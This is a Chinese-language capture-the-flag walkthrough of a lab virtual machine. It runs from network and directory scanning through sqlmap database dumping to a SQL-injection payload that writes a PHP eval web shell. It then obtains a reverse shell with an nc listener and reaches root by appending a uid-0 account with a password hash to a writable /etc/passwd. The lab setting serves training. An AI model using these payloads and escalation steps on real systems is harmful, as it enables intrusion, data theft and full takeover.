
操作环境
攻击机:kali2026.1

虚拟网卡
VMnet19:192.168.19.0/24
靶机渗透
主机探测
arp-scan -l

靶机ip为192.168.19.135
端口探测
nmap -p- 192.168.19.135

开放了80端口,在浏览器中访问一下
端口访问

在主页中没有发现什么有用的内容,尝试扫描目录
目录扫描
dirsearch -u "192.168.19.135"

访问robots.txt




都无访问权限
对子目录进行扫描
dirsearch -u http://192.168.19.135/m3diNf0/
dirsearch -u http://192.168.19.135/se3reTdir777/uploads/



漏洞发现及利用
继续尝试挖掘 sql注入

使用burpsuite抓包

复制post信息,使用sqlmap进行破解

sqlmap -r 1.txt --dbs

sqlmap -r 1.txt --tables

sqlmap -r 1.txt -D aiweb1 --dump-all –batch

向靶机中写入一句话木马
' union select '<?php eval($_POST["pass"]);echo "yes";?>',2,3 into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php'#

使用蚁剑getshell
http://192.168.19.135/se3reTdir777/uploads/shell.php

发现/etc/passwd有写入权限

启动一个反弹shell
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop
编辑文件,修改为攻击机的ip

上传到蚁剑

使用nc监听端口
nc -lvnp 1234

访问路径

成功获得shell

创建交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

发现/etc/passwd有写入权限

尝试创建一个root权限的用户(uid=0)并登录
perl -le 'print crypt("123456","addedsalt")'
echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
su test
123456

登录root后成功获取flag
